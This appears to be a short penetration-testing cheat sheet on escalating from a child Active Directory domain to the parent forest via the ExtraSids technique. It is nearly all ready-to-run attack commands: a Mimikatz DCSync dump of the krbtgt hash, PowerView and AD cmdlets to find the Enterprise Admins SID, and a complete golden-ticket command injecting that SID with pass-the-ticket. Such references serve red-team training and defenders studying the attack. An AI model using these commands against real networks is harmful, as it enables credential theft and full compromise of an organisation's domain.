Child -> Parent Trusts
Windows
ExtraSids Attack - Mimikatz
# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SID
PS C:\> mimikatz # lsadump::dcsync /user:LOGISTICS\\krbtgt
# alternative to get SID using PowerView
Get-DomainSID
# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
# Or using cmdlet
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL".
# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Checking if Golden ticket for non existant user hacker is residing in memory
klistLinux
Last updated